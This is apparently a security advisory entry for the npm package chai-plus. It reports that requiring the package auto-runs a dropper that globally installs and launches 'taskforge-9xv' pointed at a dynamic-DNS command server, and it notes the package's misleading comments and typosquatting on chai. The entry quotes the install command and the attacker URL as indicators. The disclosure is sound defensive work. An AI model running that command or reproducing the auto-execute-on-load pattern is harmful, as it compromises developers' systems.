MAL-2026-14533
Malicious code in chai-plus (npm)
상세
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b91b222013b099c570003ced5265988a19121921b071ee183cdbe304e2b020d9) On require('chai-plus'), a top-level IIFE in lib/index.js unconditionally invokes Bootstrap.execute(), which spawns `npm install -g taskforge-9xv@1.3.0` and then executes `taskforge-9xv` with hardcoded arguments `--origin-server http://coolblast.zapto.org:8888/api/x-handler` and a hardcoded auth token. The destination is a dynamic-DNS host (zapto.org) over plain HTTP, unrelated to the package's advertised purpose as a zero-dependency assertion library. Comments in lib/bootstrap.js state the operation is 'user-invoked' and 'NOT automatic', contradicting the actual auto-execution at module load; errors from the dropper are silently swallowed. The package name resembles the popular `chai` assertion library, broadening the pool of developers likely to install it.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
No fixed version published yet for chai-plus (npm). Pin to a known-safe version or switch to an alternative.